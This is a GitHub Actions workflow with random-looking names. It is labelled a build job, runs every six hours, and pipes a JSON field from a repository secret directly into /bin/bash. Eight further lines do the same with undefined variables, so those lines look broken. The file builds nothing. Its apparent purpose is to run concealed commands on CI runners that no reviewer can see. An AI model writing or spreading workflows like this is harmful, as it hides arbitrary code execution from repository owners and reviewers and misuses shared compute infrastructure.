name: xuzhibai3856

on:
  workflow_dispatch:
  schedule:
    - cron: '59 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuzhibai3856
        env:
          fu97373: ${{ secrets.fu97373 }}
        run: |
          echo $fu97373 | jq -r .ytf182 | /bin/bash
          echo $posy089 | jq -r .dljk48594 | /bin/bash
          echo $w1321 | jq -r .kautk64036 | /bin/bash
          echo $ymzfv512 | jq -r .rzsq32 | /bin/bash
          echo $tzivz95 | jq -r .tkxwb63618 | /bin/bash
          echo $pjna79665 | jq -r .ajnbi0 | /bin/bash
          echo $re1 | jq -r .orpdt09745 | /bin/bash
          echo $kjh40958 | jq -r .qkj9857 | /bin/bash
          echo $srecb47421 | jq -r .v38270 | /bin/bash

